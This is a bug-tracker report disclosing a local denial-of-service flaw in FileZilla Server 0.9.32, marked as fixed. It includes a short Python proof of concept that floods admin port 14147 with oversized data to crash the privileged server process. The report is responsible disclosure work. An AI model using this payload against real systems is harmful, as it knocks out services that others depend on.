FileZilla Server version 0.9.32 local denial of service
| Reported by: | Juan Pablo Lopez Yacubian | Owned by: | |
| Keywords: | crash, admin, 14147, fixed | Cc: | |
| Component version: | | Operating system type: | Windows |
| Operating system version: | XP SP3 | | |
The problem is in a local port (14147) that "FileZilla Server" uses for its interface.
If you send some data to this port, which is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crashes.
I did some tests with a debugger and I could not run code. For me it is only a denial of service, but it is important to repair it because this process runs with the system privileges.
I wrote a PoC in Python for testing:
from socket import *

host = "127.0.0.1"
port = 14147
data = "A" * 698000

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(data)
s.close()
OS: Windows XP SP3, all patches
Juan Pablo Lopez Yacubian